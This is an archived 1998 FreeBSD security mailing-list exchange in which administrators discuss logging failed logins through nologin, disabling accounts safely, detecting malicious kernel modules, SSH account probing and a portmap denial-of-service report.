From owner-freebsd-security Sun May 24 23:34:58 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA02738 for freebsd-security-outgoing; Sun, 24 May 1998 23:34:58 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from antipodes.cdrom.com (castles213.castles.com [208.214.165.213]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA02492 for ; Sun, 24 May 1998 23:33:52 -0700 (PDT) (envelope-from mike@antipodes.cdrom.com) Received: from antipodes.cdrom.com (localhost [127.0.0.1]) by antipodes.cdrom.com (8.8.8/8.8.5) with ESMTP id WAA10561; Sun, 24 May 1998 22:28:50 -0700 (PDT) Message-Id: <199805250528.WAA10561@antipodes.cdrom.com> X-Mailer: exmh version 2.0zeta 7/24/97 To: Wes Peters cc: Philippe Regnauld , Mike Smith , freebsd-security@FreeBSD.ORG Subject: Re: SKey and locked account In-reply-to: Your message of "Fri, 22 May 1998 07:24:54 MDT." <35657CA6.D93AC10D@softweyr.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Sun, 24 May 1998 22:28:50 -0700 From: Mike Smith Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk > Yeah, this little bit of UNIX arcana has been batted back and forth > for years. At least FreeBSD *has* a nologin program, see nologin(8). > I don't like it, because it doesn't log the failed access. Here's my > replacement, which does: > syslog(LOG_CRIT, "%s on %s", user, device); Why LOG_CRIT? I would have expected something a little lower perhaps? (Especially if you're using it in an ISP context...) At any rate, how do people feel about this? How about a shellscript version using logger(8)? -- \\ Sometimes you're ahead, \\ Mike Smith \\ sometimes you're behind. \\ mike@smith.net.au \\ The race is long, and in the \\ msmith@freebsd.org \\ end it's only with yourself. \\ msmith@cdrom.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon May 25 00:44:19 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA16447 for freebsd-security-outgoing; Mon, 25 May 1998 00:44:19 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from firewall.ftf.dk (root@mail.ftf.dk [129.142.64.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA16310 for ; Mon, 25 May 1998 00:44:04 -0700 (PDT) (envelope-from regnauld@deepo.prosa.dk) Received: from mail.prosa.dk ([192.168.100.2]) by firewall.ftf.dk (8.7.6/8.7.3) with ESMTP id LAA29885; Mon, 25 May 1998 11:44:17 +0200 Received: from deepo.prosa.dk (deepo.prosa.dk [192.168.100.10]) by mail.prosa.dk (8.8.5/8.8.5/prosa-1.1) with ESMTP id JAA04937; Mon, 25 May 1998 09:42:42 +0200 (CEST) Received: (from regnauld@localhost) by deepo.prosa.dk (8.8.7/8.8.5/prosa-1.1) id JAA21712; Mon, 25 May 1998 09:42:11 +0200 (CEST) Message-ID: <19980525094211.24803@deepo.prosa.dk> Date: Mon, 25 May 1998 09:42:11 +0200 From: Philippe Regnauld To: Mike Smith Cc: Are Bryne , freebsd-security@FreeBSD.ORG Subject: Re: SKey and locked account References: <199805232247.PAA02689@antipodes.cdrom.com> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Mailer: Mutt 0.88e In-Reply-To: <199805232247.PAA02689@antipodes.cdrom.com>; from Mike Smith on Sat, May 23, 1998 at 03:47:50PM -0700 X-Operating-System: FreeBSD 2.2.5-STABLE i386 Organization: PROSA Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk Mike Smith writes: > > > > Then perhaps the default /nonexistent 'shell' for various password file > > entries should be changed also? > > It would probably make sense to have /sbin/nologin the default shell > for those accounts, yes. Want to file a PR? Give me a day or so (if someone else doesn't do it), I'll write up the PR (man page patch + PR for /nonexistent). -- -[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]- «Pluto placed his bad dog at the entrance of Hades to keep the dead IN and the living OUT! The archetypical corporate firewall?» - S. Kelly Bootle To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon May 25 00:44:46 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA16580 for freebsd-security-outgoing; Mon, 25 May 1998 00:44:46 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from firewall.ftf.dk (root@mail.ftf.dk [129.142.64.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA16537 for ; Mon, 25 May 1998 00:44:36 -0700 (PDT) (envelope-from regnauld@deepo.prosa.dk) Received: from mail.prosa.dk ([192.168.100.2]) by firewall.ftf.dk (8.7.6/8.7.3) with ESMTP id LAA29900; Mon, 25 May 1998 11:45:36 +0200 Received: from deepo.prosa.dk (deepo.prosa.dk [192.168.100.10]) by mail.prosa.dk (8.8.5/8.8.5/prosa-1.1) with ESMTP id JAA04941; Mon, 25 May 1998 09:44:01 +0200 (CEST) Received: (from regnauld@localhost) by deepo.prosa.dk (8.8.7/8.8.5/prosa-1.1) id JAA21722; Mon, 25 May 1998 09:43:31 +0200 (CEST) Message-ID: <19980525094331.20142@deepo.prosa.dk> Date: Mon, 25 May 1998 09:43:31 +0200 From: Philippe Regnauld To: Mike Smith Cc: Wes Peters , freebsd-security@FreeBSD.ORG Subject: Re: SKey and locked account References: <35657CA6.D93AC10D@softweyr.com> <199805250528.WAA10561@antipodes.cdrom.com> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Mailer: Mutt 0.88e In-Reply-To: <199805250528.WAA10561@antipodes.cdrom.com>; from Mike Smith on Sun, May 24, 1998 at 10:28:50PM -0700 X-Operating-System: FreeBSD 2.2.5-STABLE i386 Organization: PROSA Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk Mike Smith writes: > > syslog(LOG_CRIT, "%s on %s", user, device); > > Why LOG_CRIT? I would have expected something a little lower perhaps? > (Especially if you're using it in an ISP context...) > > At any rate, how do people feel about this? How about a shellscript > version using logger(8)? I'd like failed logins (at least on disabled accounts) to be logged, yes. It would also be a nice plus if logging could be limited... -- -[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]- «Pluto placed his bad dog at the entrance of Hades to keep the dead IN and the living OUT! The archetypical corporate firewall?» - S. Kelly Bootle To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon May 25 01:19:19 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA25671 for freebsd-security-outgoing; Mon, 25 May 1998 01:19:19 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from antipodes.cdrom.com (castles213.castles.com [208.214.165.213]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA25650 for ; Mon, 25 May 1998 01:19:14 -0700 (PDT) (envelope-from mike@antipodes.cdrom.com) Received: from antipodes.cdrom.com (localhost [127.0.0.1]) by antipodes.cdrom.com (8.8.8/8.8.5) with ESMTP id AAA11151; Mon, 25 May 1998 00:15:07 -0700 (PDT) Message-Id: <199805250715.AAA11151@antipodes.cdrom.com> X-Mailer: exmh version 2.0zeta 7/24/97 To: Philippe Regnauld cc: Wes Peters , freebsd-security@FreeBSD.ORG Subject: Re: SKey and locked account In-reply-to: Your message of "Mon, 25 May 1998 09:43:31 +0200." <19980525094331.20142@deepo.prosa.dk> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Date: Mon, 25 May 1998 00:15:06 -0700 From: Mike Smith Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by hub.freebsd.org id BAA25657 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk > Mike Smith writes: > > > syslog(LOG_CRIT, "%s on %s", user, device); > > > > Why LOG_CRIT? I would have expected something a little lower perhaps? > > (Especially if you're using it in an ISP context...) > > > > At any rate, how do people feel about this? How about a shellscript > > version using logger(8)? > > I'd like failed logins (at least on disabled accounts) to be logged, > yes. It would also be a nice plus if logging could be limited... Limiting is a bit difficult (no state is preserved across multiple nologin invocations). You could perhaps rely on the 'last message repeat' feature in syslog... -- \\ Sometimes you're ahead, \\ Mike Smith \\ sometimes you're behind. \\ mike@smith.net.au \\ The race is long, and in the \\ msmith@freebsd.org \\ end it's only with yourself. \\ msmith@cdrom.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon May 25 05:33:25 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id FAA10026 for freebsd-security-outgoing; Mon, 25 May 1998 05:33:25 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from bagira.fsz.bme.hu (mohacsi@bagira.fsz.bme.hu [152.66.76.5]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id FAA09982 for ; Mon, 25 May 1998 05:33:01 -0700 (PDT) (envelope-from mohacsi@bagira.fsz.bme.hu) Received: from localhost (mohacsi@localhost) by bagira.fsz.bme.hu (8.9.0.Beta5/8.9.0.Beta3+BME-IIT) with SMTP id OAA03182; Mon, 25 May 1998 14:31:43 +0200 (MET DST) Date: Mon, 25 May 1998 14:31:41 +0200 (MET DST) From: Janos Mohacsi To: Wes Peters cc: freebsd-security@FreeBSD.ORG Subject: Re: SKey and locked account In-Reply-To: <35657CA6.D93AC10D@softweyr.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk On Fri, 22 May 1998, Wes Peters wrote: > Date: Fri, 22 May 1998 07:24:54 -0600 > From: Wes Peters > To: Philippe Regnauld > Cc: Mike Smith , freebsd-security@FreeBSD.ORG > Subject: Re: SKey and locked account > > Philippe Regnauld wrote: > > Ok -- just referrring to the man page: > > > > The password field is the encrypted form of the password. If the > > password field is empty, no password will be required to gain access to > > the machine. This is almost invariably a mistake. Because these files > > contain the encrypted user passwords, they should not be readable by any- > > one without appropriate privileges. Administrative accounts have a pass- > > word field containing an asterisk `*' which disallows normal logins. > > > > ... it doesn't mention the fact that they _also_ have an invalid > > shell. > > Yeah, this little bit of UNIX arcana has been batted back and forth > for years. At least FreeBSD *has* a nologin program, see nologin(8). > I don't like it, because it doesn't log the failed access. Here's my Cannot be done a logging with the program with logger(1) ? > replacement, which does: Janos Mohacsi To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon May 25 06:52:49 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id GAA20643 for freebsd-security-outgoing; Mon, 25 May 1998 06:52:49 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from bagira.fsz.bme.hu (mohacsi@bagira.fsz.bme.hu [152.66.76.5]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id GAA20635 for ; Mon, 25 May 1998 06:52:36 -0700 (PDT) (envelope-from mohacsi@bagira.fsz.bme.hu) Received: from localhost (mohacsi@localhost) by bagira.fsz.bme.hu (8.9.0.Beta5/8.9.0.Beta3+BME-IIT) with SMTP id PAA03764 for ; Mon, 25 May 1998 15:51:51 +0200 (MET DST) Date: Mon, 25 May 1998 15:51:49 +0200 (MET DST) From: Janos Mohacsi To: freebsd-security@FreeBSD.ORG Subject: SRP integration Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk Hi! Is there anybody doing SRP (Secure Remote Password) integration into the FreeBSD security system? If not. How could I join to the team of developers who is maintaining the security system of FreeBSD? Our Should I send just diffs, if I am ready? Sincerely, Janos Mohacsi To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon May 25 07:59:45 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA01094 for freebsd-security-outgoing; Mon, 25 May 1998 07:59:45 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gateman.zeus.leitch.com (gateman.zeus.leitch.com [204.187.61.193]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA01086 for ; Mon, 25 May 1998 07:59:37 -0700 (PDT) (envelope-from woods@tap.zeus.leitch.com) Received: from zeus.leitch.com (tap.zeus.leitch.com [204.187.61.10]) by gateman.zeus.leitch.com (8.8.5/8.7.3/1.0) with ESMTP id KAA19188 for ; Mon, 25 May 1998 10:59:11 -0400 (EDT) Received: from brain.zeus.leitch.com (brain.zeus.leitch.com [204.187.61.32]) by zeus.leitch.com (8.7.5/8.7.3/1.0) with ESMTP id KAA26641 for ; Mon, 25 May 1998 10:59:22 -0400 (EDT) Received: (from woods@localhost) by brain.zeus.leitch.com (8.8.8/8.8.8) id KAA05536; Mon, 25 May 1998 10:59:22 -0400 (EDT) (envelope-from woods@tap.zeus.leitch.com) Date: Mon, 25 May 1998 10:59:22 -0400 (EDT) Message-Id: <199805251459.KAA05536@brain.zeus.leitch.com> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit From: woods@zeus.leitch.com (Greg A. Woods) To: freebsd-security@FreeBSD.ORG Subject: Re: Virus on FreeBSD In-Reply-To: Philippe Regnauld's message of "Fri, May 22, 1998 16:06:19 +0200" regarding "Re: Virus on FreeBSD" id <19980522160618.52012@deepo.prosa.dk> References: <01BD8571.D24221F0@PCNTWS1> <19980522160618.52012@deepo.prosa.dk> X-Mailer: VM 6.45 under Emacs 20.2.1 Reply-To: freebsd-security@FreeBSD.ORG Organization: Planix, Inc.; Toronto, Ontario; Canada Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk [ On Fri, May 22, 1998 at 16:06:19 (+0200), Philippe Regnauld wrote: ] > Subject: Re: Virus on FreeBSD > > Robert Watson writes: > > > To protect the kernel properly, lkms need to be disabled at a sufficiently > > high run-level (possibly always), and appropriate file system stuff > > protected. Personally, I like the idea of using a CD-ROM for a file > > system, but it's not so very fast. > > 32x will deliver pretty good performance -- not unlike a washing > machine on spin-cycle, but ok. You'll have much more luck, more performance, and much higher MTBF, if you find a SCSI drive that has a physical write-protect jumper. Such critters do exist, for example the Seagate Cheetah 4LP (ST34501). -- Greg A. Woods +1 416 443-1734 VE3TCP Planix, Inc. ; Secrets of the Weird To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon May 25 08:11:26 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA02931 for freebsd-security-outgoing; Mon, 25 May 1998 08:11:26 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gateman.zeus.leitch.com (gateman.zeus.leitch.com [204.187.61.193]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id IAA02910 for ; Mon, 25 May 1998 08:11:15 -0700 (PDT) (envelope-from woods@tap.zeus.leitch.com) Received: from zeus.leitch.com (tap.zeus.leitch.com [204.187.61.10]) by gateman.zeus.leitch.com (8.8.5/8.7.3/1.0) with ESMTP id LAA19239; Mon, 25 May 1998 11:10:31 -0400 (EDT) Received: from brain.zeus.leitch.com (brain.zeus.leitch.com [204.187.61.32]) by zeus.leitch.com (8.7.5/8.7.3/1.0) with ESMTP id LAA26676; Mon, 25 May 1998 11:10:43 -0400 (EDT) Received: (from woods@localhost) by brain.zeus.leitch.com (8.8.8/8.8.8) id LAA05638; Mon, 25 May 1998 11:10:42 -0400 (EDT) (envelope-from woods@tap.zeus.leitch.com) Date: Mon, 25 May 1998 11:10:42 -0400 (EDT) Message-Id: <199805251510.LAA05638@brain.zeus.leitch.com> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit From: woods@zeus.leitch.com (Greg A. Woods) To: ark@eltex.spb.ru Cc: freebsd-security@FreeBSD.ORG Subject: Re: Virus on FreeBSD In-Reply-To: ark@eltex.spb.ru's message of "Fri, May 22, 1998 14:02:08 GMT" regarding "Re: Virus on FreeBSD" id <199805221402.OAA16417@paranoid.eltex.spb.ru> References: <199805211901.PAA23176@brain.zeus.leitch.com> <199805221402.OAA16417@paranoid.eltex.spb.ru> X-Mailer: VM 6.45 under Emacs 20.2.1 Reply-To: freebsd-security@FreeBSD.ORG Organization: Planix, Inc.; Toronto, Ontario; Canada Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk [ On Fri, May 22, 1998 at 14:02:08 (GMT), ark@eltex.spb.ru wrote: ] > Subject: Re: Virus on FreeBSD > > 2.1.7.1 does not have NO_LKM option in LINT. Don't know if it does > something for that system. Looks like the RELENG_2_1_0 branch only has the changes to disallow LKM manipulations in "secure mode" (i.e. securelevel > 0) (prior to 2.1.5). RELENG_2_2 had the NO_LKM option pulled in as of 2.2.6. Now that I look at the way NO_LKM was implemented, I think it could be a *lot* more agressive in the amount of code it comments out. All it appears to do now is inhibit the initialization of the LKM "driver". -- Greg A. Woods +1 416 443-1734 VE3TCP Planix, Inc. ; Secrets of the Weird To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon May 25 08:18:41 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA04131 for freebsd-security-outgoing; Mon, 25 May 1998 08:18:41 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gateman.zeus.leitch.com (gateman.zeus.leitch.com [204.187.61.193]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id IAA04119 for ; Mon, 25 May 1998 08:18:31 -0700 (PDT) (envelope-from woods@tap.zeus.leitch.com) Received: from zeus.leitch.com (tap.zeus.leitch.com [204.187.61.10]) by gateman.zeus.leitch.com (8.8.5/8.7.3/1.0) with ESMTP id LAA19262 for ; Mon, 25 May 1998 11:18:16 -0400 (EDT) Received: from brain.zeus.leitch.com (brain.zeus.leitch.com [204.187.61.32]) by zeus.leitch.com (8.7.5/8.7.3/1.0) with ESMTP id LAA26693 for ; Mon, 25 May 1998 11:18:27 -0400 (EDT) Received: (from woods@localhost) by brain.zeus.leitch.com (8.8.8/8.8.8) id LAA05684; Mon, 25 May 1998 11:18:27 -0400 (EDT) (envelope-from woods@tap.zeus.leitch.com) Date: Mon, 25 May 1998 11:18:27 -0400 (EDT) Message-Id: <199805251518.LAA05684@brain.zeus.leitch.com> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit From: woods@zeus.leitch.com (Greg A. Woods) To: freebsd-security@FreeBSD.ORG Subject: Re: Virus on FreeBSD In-Reply-To: Nicholas Charles Brawn's message of "Fri, May 22, 1998 10:02:46 +1000" regarding "Re: Virus on FreeBSD" id References: <199805211431.KAA17444@brain.zeus.leitch.com> X-Mailer: VM 6.45 under Emacs 20.2.1 Reply-To: freebsd-security@FreeBSD.ORG Organization: Planix, Inc.; Toronto, Ontario; Canada Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk [ On Fri, May 22, 1998 at 10:02:46 (+1000), Nicholas Charles Brawn wrote: ] > Subject: Re: Virus on FreeBSD > > > I'd love to have a "virus" scanner that could detect the signature of a > > LKM module or the LKM loader in a kernel. Of course by "signature" here > > I mean something that would recognize the style of code necessary to > > perform this operation, not the specific sequence of bits in any given > > implementation. > > You may have a point here. Is there any way you could "sign" a module to > ensure it's authenticity? And on top of that build in an automatic > authentication system within the kernel that rejects lkm's that are not > signed? Perhaps this could be included so as to be performed at one of the > securelevels? I meant that the other way around. I don't think I'd trust such signatures. If the system has been cracked enough that someone is trying to load some untrusted module, then how can I trust the signature, no matter where I retrieve it from? I meant some way to detect the pattern of code in the *kernel* that is necessary to implement a module loader. I don't have my hopes up, of course, as this is indeed a very simple operation and not a whole lot different than any number of other operations an OS performs. Detecting the pattern of code of a loadable module in files might be a good thing too, as you could then scan for hidden instances of such modules. Of course any cracker worth their salt would at least obscure the contents of the file with some trivial "encryption" mechanism.... :-) -- Greg A. Woods +1 416 443-1734 VE3TCP Planix, Inc. ; Secrets of the Weird To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon May 25 08:35:50 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA06157 for freebsd-security-outgoing; Mon, 25 May 1998 08:35:50 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gateman.zeus.leitch.com (gateman.zeus.leitch.com [204.187.61.193]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id IAA06139 for ; Mon, 25 May 1998 08:35:41 -0700 (PDT) (envelope-from woods@tap.zeus.leitch.com) Received: from zeus.leitch.com (tap.zeus.leitch.com [204.187.61.10]) by gateman.zeus.leitch.com (8.8.5/8.7.3/1.0) with ESMTP id LAA19320 for ; Mon, 25 May 1998 11:35:26 -0400 (EDT) Received: from brain.zeus.leitch.com (brain.zeus.leitch.com [204.187.61.32]) by zeus.leitch.com (8.7.5/8.7.3/1.0) with ESMTP id LAA26747 for ; Mon, 25 May 1998 11:35:37 -0400 (EDT) Received: (from woods@localhost) by brain.zeus.leitch.com (8.8.8/8.8.8) id LAA05810; Mon, 25 May 1998 11:35:37 -0400 (EDT) (envelope-from woods@tap.zeus.leitch.com) Date: Mon, 25 May 1998 11:35:37 -0400 (EDT) Message-Id: <199805251535.LAA05810@brain.zeus.leitch.com> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit From: woods@zeus.leitch.com (Greg A. Woods) To: freebsd-security@FreeBSD.ORG Subject: Re: SKey and locked account In-Reply-To: Matthew N. Dodd's message of "Fri, May 22, 1998 12:35:15 -0400" regarding "Re: SKey and locked account " id References: X-Mailer: VM 6.45 under Emacs 20.2.1 Reply-To: woods@zeus.leitch.com (Greg A. Woods) Organization: Planix, Inc.; Toronto, Ontario; Canada Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk [ On Fri, May 22, 1998 at 12:35:15 (-0400), Matthew N. Dodd wrote: ] > Subject: Re: SKey and locked account > > On Fri, 22 May 1998, Snob Art Genre wrote: > > How? I don't like this: isn't it standard practice across unixes to set > > a nonexistent shell to disable logins? POLA etc. > > I remember getting around this by ftp'ing a .forward file containing nice > things to reset my shell. Of course, this assumes that ftp is setup as to > allow logins for users with 'invalid' shells. Usually that's an accident (i.e. allowing ftp for users with "invalid" shells), sometimes based on a nasty but all too common misunderstanding about /etc/shells. Naturally /sbin/nologin should *never* be included in /etc/shells. If someone thinks they want it there then they really need to think of some other way to allow users to disable their accounts on their own! ;-) Unfortunately the shells(5) manual page doesn't mention this quirk related to ftpd [I'll file a PR if I remember when I have a spare moment]. Of course if you really want to disable a user's account then you should set their shell to /sbin/nologin, *AND* disable their password, either by adding some string such as "*NOLOGIN*" to the beginning of the field (in order to invalidate their current password but leave it intact), or simply replace the entire field contents with an invalid encrypted string, such as "*". Note too that SSH at one time did not correctly implement password field handling for invalid encrypted strings (and may still not do so) and in addition it (until the most recent release) revealed the existance of an account by giving a different response to an incorrect password. I've still not had time to examine the code to see that this was fixed on the server side either -- if not then a malicious client could still be used to probe for valid accounts. -- Greg A. Woods +1 416 443-1734 VE3TCP Planix, Inc. ; Secrets of the Weird To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon May 25 10:35:50 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA27243 for freebsd-security-outgoing; Mon, 25 May 1998 10:35:50 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from priscilla.mu.org (paul@priscilla.mu.org [206.156.231.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA27200 for ; Mon, 25 May 1998 10:35:26 -0700 (PDT) (envelope-from paul@priscilla.mu.org) Received: (from paul@localhost) by priscilla.mu.org (8.8.8/8.8.8) id MAA19308; Mon, 25 May 1998 12:34:18 -0500 (CDT) (envelope-from paul) Message-ID: <19980525123417.A19300@mu.org> Date: Mon, 25 May 1998 12:34:17 -0500 From: Paul Saab To: freebsd-security@FreeBSD.ORG Subject: possible problem with portmap Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.91.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk Today I logged into our server and noticed someone sitting on port 111. Are there any known problems with portmap? this is what I got from netstat.. tcp 0 0 tranq1.sunrpc dialup239-1-15.s.2988 ESTABLISHED tcp 0 0 tranq1.sunrpc dialup239-1-15.s.2987 ESTABLISHED Thanks. paul To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon May 25 12:45:43 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA21709 for freebsd-security-outgoing; Mon, 25 May 1998 12:45:43 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ymris.ddm.on.ca (p.radon.sentex.ca [207.245.238.64]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA21663 for ; Mon, 25 May 1998 12:44:56 -0700 (PDT) (envelope-from dchapes@ddm.on.ca) Received: from squigy.ddm.on.ca (squigy.ddm.on.ca [209.47.139.138]) by ymris.ddm.on.ca (8.8.8/8.8.8) with ESMTP id PAA02401 for ; Mon, 25 May 1998 15:44:40 -0400 (EDT) (envelope-from dchapes@ymris.ddm.on.ca) From: Dave Chapeskie Received: (from dchapes@localhost) by squigy.ddm.on.ca (8.8.8/8.8.7) id PAA15659; Mon, 25 May 1998 15:44:39 -0400 (EDT) Message-ID: <19980525154439.60457@ddm.on.ca> Date: Mon, 25 May 1998 15:44:39 -0400 To: freebsd-security@FreeBSD.ORG Subject: Re: Virus on FreeBSD Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <199805211431.KAA17444@brain.zeus.leitch.com> <199805251518.LAA05684@brain.zeus.leitch.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.89i In-Reply-To: <199805251518.LAA05684@brain.zeus.leitch.com>; from Greg A. Woods on Mon, May 25, 1998 at 11:18:27AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk On Mon, May 25, 1998 at 11:18:27AM -0400, Greg A. Woods wrote: > I meant some way to detect the pattern of code in the *kernel* that is > necessary to implement a module loader. This would be a waste of effort IMHO. When you build the kernel you check what you are compiling in at the source level (as you've done by checking what the NO_LKM define actually disables). If someone else has the ability to change or replace the kernel on you (either on disk or in memory) then your already screwed and LKMs are the least of your worries :-) > Detecting the pattern of code of a loadable module in files might > be a good thing too, as you could then scan for hidden instances > of such modules. Of course any cracker worth their salt would at > least obscure the contents of the file with some trivial "encryption" > mechanism.... :-) Why waste your time with "trivial" encryption when there are lots of implementations of really good encryption freely available? In general I find the idea of searching of "code patterns" to be a waste of effort. Like the guy who wrote a perl script that looked for code that designed to crash machines using the pentium 'FOOF' bug. The script looked for the four byte pattern in files... it's real easy to build up the required four bytes dynamically and then run them (assuming of course that the memory protection mechanism provided by the OS either allows executing from the data area or writing to the code area). -- Dave Chapeskie , DDM Consulting To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon May 25 13:14:29 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA26275 for freebsd-security-outgoing; Mon, 25 May 1998 13:14:29 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from antipodes.cdrom.com (castles348.castles.com [208.214.167.48]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA26268 for ; Mon, 25 May 1998 13:14:24 -0700 (PDT) (envelope-from mike@antipodes.cdrom.com) Received: from antipodes.cdrom.com (localhost [127.0.0.1]) by antipodes.cdrom.com (8.8.8/8.8.5) with ESMTP id MAA13972; Mon, 25 May 1998 12:10:21 -0700 (PDT) Message-Id: <199805251910.MAA13972@antipodes.cdrom.com> X-Mailer: exmh version 2.0zeta 7/24/97 To: Paul Saab cc: freebsd-security@FreeBSD.ORG Subject: Re: possible problem with portmap In-reply-to: Your message of "Mon, 25 May 1998 12:34:17 CDT." <19980525123417.A19300@mu.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 25 May 1998 12:10:21 -0700 From: Mike Smith Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk > Today I logged into our server and noticed someone sitting on port > 111. Are there any known problems with portmap? Yes. > this is what I got from netstat.. > tcp 0 0 tranq1.sunrpc dialup239-1-15.s.2988 ESTABLISHED > tcp 0 0 tranq1.sunrpc dialup239-1-15.s.2987 ESTABLISHED Find out who the dialup user is; they're engaged in a portmap-related DoS attack on you. There were changes committed a few days back to address this - it was also discussed on BugTraq (with a not inconsiderable degree of hysteria it seems). -- \\ Sometimes you're ahead, \\ Mike Smith \\ sometimes you're behind. \\ mike@smith.net.au \\ The race is long, and in the \\ msmith@freebsd.org \\ end it's only with yourself. \\ msmith@cdrom.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Mon May 25 13:34:26 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA29508 for freebsd-security-outgoing; Mon, 25 May 1998 13:34:26 -0700 (PDT) (envelope-from 